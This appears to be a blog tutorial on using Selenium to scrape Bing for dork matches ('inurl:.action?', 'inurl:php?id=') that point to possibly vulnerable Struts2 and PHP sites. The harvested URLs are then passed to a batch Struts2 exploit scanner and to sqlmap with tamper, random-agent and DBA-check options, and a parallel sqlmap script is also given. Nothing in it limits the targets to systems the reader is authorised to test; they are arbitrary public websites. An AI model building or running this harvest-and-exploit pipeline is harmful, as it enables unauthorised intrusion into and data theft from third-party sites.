In this article I will share how to use Selenium to crawl the Internet for known vulnerabilities. I hope you gain something from reading it.
Basic knowledge of Selenium
Introduction
Crawling static web pages with Python is straightforward: the requests library sends the requests, and bs4 or lxml parses the returned page content.
However, the major search engines now load their results dynamically. For crawling dynamic pages I know of several approaches:
1. Hit the URL directly: find the API endpoint the JavaScript calls.
2. Use WebKit to simulate the JavaScript manually.
3. scrapyjs: acts like glue and integrates Splash into Scrapy.
4. Splash + Docker.
5. PhantomJS + Selenium: drives a simulated browser; it is resource-heavy and not suited to large-scale crawling.
Here we use method 5, but PhantomJS is no longer officially paired with Selenium (you can still use it if you want), and both Firefox and Google Chrome now ship headless modes, so we use the Chrome driver instead (watch the driver and browser versions when debugging: the CSS and XPath selectors may differ between versions).
I am not running headless here, because a visible browser is easier to debug and this is only for security research. If you want headless mode, modify the setup like this:
from selenium import webdriver
from selenium.webdriver.chrome.options import Options

chrome_options = Options()
chrome_options.add_argument("--headless")
driver = webdriver.Chrome(executable_path=r'D:\selenium\chrome\chromedriver.exe', chrome_options=chrome_options)
Installing Selenium
Download the driver:
https://www.cnblogs.com/freeweb/p/4568463.html
https://www.cnblogs.com/qiezizi/p/8632058.html
Install the Selenium library for Python: pip install selenium
You can look up the basic syntax yourself.
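Before going further, here is a minimal sketch of the API style used throughout this article (Selenium 3-era find_element_by_* calls). The chromedriver path and the search-box element id are assumptions; adjust them to your own environment.
# coding=utf-8
# Minimal Selenium sketch using the Selenium 3-style API from this article.
# The driver path and the "sb_form_q" element id are assumptions.
from selenium import webdriver
import selenium.webdriver.support.ui as ui

driver = webdriver.Chrome(executable_path="D:/selenium/chrome/chromedriver.exe")
wait = ui.WebDriverWait(driver, 20)            # wait up to 20 seconds for elements

driver.get("https://cn.bing.com")              # open the search engine
box = wait.until(lambda x: x.find_element_by_id("sb_form_q"))  # Bing's search box
box.send_keys("inurl:.action?")                # type the dork
box.submit()                                   # submit the search form
print(driver.title)                            # title of the results page

driver.quit()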
Selenium FAQ
I still want to cover this: the syntax is simple, but debugging is the troublesome part.
1. Unable to locate element
The cause is grabbing an element before the page has finished loading. My first fix was to sleep(), but that can cause the socket to disconnect, so use the built-in wait instead:
import selenium.webdriver.support.ui as ui

wait = ui.WebDriverWait(driver, 20)
print wait.until(lambda x: x.find_element_by_css_selector("#b_results > li.b_pag > nav > ul > li:nth-child(3) > a")).text
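The same wait can also be written with Selenium's built-in expected_conditions instead of a bare lambda; a small sketch, reusing the selector above:
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait

wait = WebDriverWait(driver, 20)
# Block until the pagination link is present in the DOM, then read its text.
link = wait.until(EC.presence_of_element_located(
    (By.CSS_SELECTOR, "#b_results > li.b_pag > nav > ul > li:nth-child(3) > a")))
print(link.text)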
2. Python ASCII encoding errors
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
3. Element is not in the view
This one hurt the most; I searched for a solution for a long time.
When "element not visible" appears,
simulate the mouse click with ActionChains (a sketch follows the reference below).
Reference:
http://www.mamicode.com/info-detail-1981462.html
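A minimal sketch of that ActionChains workaround, reusing the wait object and the pagination selector from above (everything else is an assumption):
from selenium.webdriver.common.action_chains import ActionChains

# Locate the element that raises "element not visible" when clicked directly.
target = wait.until(lambda x: x.find_element_by_css_selector(
    "#b_results > li.b_pag > nav > ul > li:nth-child(3) > a"))
# Move the mouse onto the element first, then click it.
ActionChains(driver).move_to_element(target).click(target).perform()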
4. Set the crawling target
How do we write it? We will search the international version of Bing and crawl for URLs that may be vulnerable to Struts2.
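The start_url in the code below was simply copied from the browser's address bar after searching for the dork; only the q= parameter really matters. A sketch of how the query maps to the URL (Python 2's urllib, matching the rest of the code in this article):
# coding=utf-8
# Sketch: build a Bing search URL for the Struts2 dork.
import urllib

dork = "inurl:.action?"
print("https://cn.bing.com/search?q=" + urllib.quote_plus(dork))
# -> https://cn.bing.com/search?q=inurl%3A.action%3F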
5. Write code
If you are interested in the writing process, study it on your own; I will only mention a few points here. Look up any unfamiliar syntax. The idea is simply to page through the results and collect the URLs on each page. The XPath and CSS selectors depend on your browser and driver version, so open the browser's developer tools and adjust the selectors yourself (don't say it doesn't work; it has been tested).
Code:
# coding=utf-8
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import time
from selenium import webdriver
import selenium.webdriver.support.ui as ui
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import TimeoutException
# import the ActionChains mouse-operation class
from selenium.webdriver.common.action_chains import ActionChains

start_url = "https://cn.bing.com/search?q=inurl%3a.action%3f&qs=n&sp=-1&pq=inurl%3a.action%3f&sc=1-14&sk=&cvid=DBCB283FC96249E8A522340DF4740769&first=67&FORM=PERE4"
urls = range(200)                  # pre-allocated slots for the collected URLs
m = 0                              # index of the next free slot in urls
s = [1, 2, 3, 4, 5, 6, 7, 8, 9]    # result positions on one page

driver = webdriver.Chrome(executable_path="D:/selenium/chrome/chromedriver.exe")
wait = ui.WebDriverWait(driver, 20)
driver.get(start_url)

for n in range(7, 57):
    # domestic version: the position of the "next page" link alternates
    if n % 2 == 1:
        i = 7
    else:
        i = 8
    for j in s[0:]:
        try:
            # international version: //*[@id="b_results"]/li[x]/h3/a
            # print wait.until(lambda x: x.find_element_by_xpath('//*[@id="b_results"]/li[' + str(j) + ']/h3/a').get_attribute("href"))
            # urls[m] = wait.until(lambda x: x.find_element_by_xpath('//*[@id="b_results"]/li[' + str(j) + ']/h3/a').get_attribute("href"))
            # domestic version
            print wait.until(lambda x: x.find_element_by_xpath('/html/body/div[1]/ol[1]/li[' + str(j) + ']/h3/a').get_attribute("href"))
            urls[m] = wait.until(lambda x: x.find_element_by_xpath('/html/body/div[1]/ol[1]/li[' + str(j) + ']/h3/a').get_attribute("href"))
            m = m + 1
        except Exception as e:
            continue
    try:
        print i
        # click the "next page" link
        ActionChains(driver).click(wait.until(lambda x: x.find_element_by_css_selector(
            "#b_results > li.b_pag > nav > ul > li:nth-child(" + str(i) + ") > a"))).perform()
    except Exception as e:
        continue

with open("urlss.txt", "a+") as f:
    for url in urls[0:]:
        f.write(str(url))
        f.write('\n')

driver.quit()
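Since urls is pre-allocated as range(200), the unused slots end up in the file as plain integers, and the same link can be collected more than once. Before handing the file to a scanner it may be worth cleaning it up; a small sketch (the output file name urls_clean.txt is hypothetical):
# coding=utf-8
# Sketch: drop the integer placeholders left over from "urls = range(200)"
# and remove duplicate links. "urlss.txt" is the file written by the crawler
# above; "urls_clean.txt" is a hypothetical output name.
seen = set()
with open("urlss.txt") as fin, open("urls_clean.txt", "w") as fout:
    for line in fin:
        url = line.strip()
        if url.startswith("http") and url not in seen:
            seen.add(url)
            fout.write(url + "\n")
print(len(seen))   # number of unique URLs kept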
The result
Here I used a batch scanning tool.
Tool link:
https://www.jb51.net/softs/574358.html
There is also an open-source Struts tool on GitHub; the project keeps up with new vulnerabilities and was updated for S2-057 just a few days ago.
Author's project address:
https://github.com/Lucifer1993/struts-scan
The results of the test were as follows:
Supplement
SQL injection holes are hard to find nowadays; two years ago they were everywhere, but not anymore. Still, I wrote a crawler for them as well.
Goal: search for the sensitive keyword inurl:php?id=
Code:
# coding=utf-8
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import time
from selenium import webdriver
import selenium.webdriver.support.ui as ui
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import TimeoutException
# import the ActionChains mouse-operation class
from selenium.webdriver.common.action_chains import ActionChains

start_url = "https://cn.bing.com/search?q=inurl%3aphp%3fid%3d&qs=HS&sc=8-0&cvid=2EEF822D8FE54B6CAAA1CE0169CA5BC5&sp=1&first=53&FORM=PERE3"
urls = range(800)                                      # pre-allocated slots for the collected URLs
m = 0                                                  # index of the next free slot in urls
s = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]    # result positions on one page

driver = webdriver.Chrome(executable_path="D:/selenium/chrome/chromedriver.exe")
wait = ui.WebDriverWait(driver, 20)
driver.get(start_url)

for i in range(1, 50):
    for j in s[0:]:
        try:
            urls[m] = wait.until(lambda x: x.find_element_by_xpath('//*[@id="b_results"]/li[' + str(j) + ']/h3/a').get_attribute("href"))
            print urls[m]
            m = m + 1
        except Exception as e:
            print e.message
    print i
    try:
        # click the "next page" link
        ActionChains(driver).click(wait.until(lambda x: x.find_element_by_css_selector(
            "#b_results > li.b_pag > nav > ul > li:nth-child(7) > a"))).perform()
    except Exception as e:
        continue

print m
with open("urls.txt", "a+") as f:
    for url in urls[0:]:
        f.write(str(url))
        f.write('\n')

driver.quit()
Test results
Because a full run takes too long, I did not test it end to end, but the URLs were crawled successfully and handed to sqlmap with the command below.
(You could also run sqlmap in parallel from the shell; the idea is offered for reference and learning only, since few vulnerabilities remain. Shell multi-threading reference: https://blog.csdn.net/bluecloudmatrix/article/details/48421577. A Python sketch of the same idea follows the option breakdown below.)
sqlmap -m urls.txt --batch --delay=1.3 --level=3 --tamper=space2comment --dbms=mysql --technique=EUS --random-agent --is-dba --time-sec=10 | tee result.txt
Breaking down the command
1. sqlmap -m: scan the targets listed in the specified file.
2. --delay: interval between requests, in seconds; the default is 0.5.
3. --level: also test request headers such as Referer and User-Agent; the default level is 1.
4. --dbms=mysql: assume the backend database is MySQL.
5. --technique=EUS: use only the E, U and S techniques (the blind techniques are skipped because the run is already long enough):
B: Boolean-based blind SQL injection
E: Error-based SQL injection
U: UNION query SQL injection
S: Stacked queries SQL injection
T: Time-based blind SQL injection
6. tee: the pipe shows the output on screen and also writes it to a file for later analysis.
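As for the parallel idea mentioned above, here is a rough Python sketch that runs one sqlmap process per URL with the same options, instead of a multi-threaded shell script. The pool size and file names are assumptions, and sqlmap is assumed to be on the PATH (otherwise invoke it as python sqlmap.py).
# coding=utf-8
# Sketch: run sqlmap against each collected URL in parallel, reusing the
# options from the command above. Pool size and file names are assumptions.
import subprocess
from multiprocessing.dummy import Pool   # thread pool; each job is a subprocess

def scan(url):
    cmd = ["sqlmap", "-u", url, "--batch", "--delay=1.3", "--level=3",
           "--tamper=space2comment", "--dbms=mysql", "--technique=EUS",
           "--random-agent", "--is-dba", "--time-sec=10"]
    return subprocess.call(cmd)

with open("urls.txt") as f:
    targets = [line.strip() for line in f if line.strip().startswith("http")]

pool = Pool(4)             # four sqlmap processes at a time
pool.map(scan, targets)
pool.close()
pool.join()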
After reading this article, you should have a basic understanding of how to use Selenium to crawl the Internet for known vulnerabilities. Thank you for reading!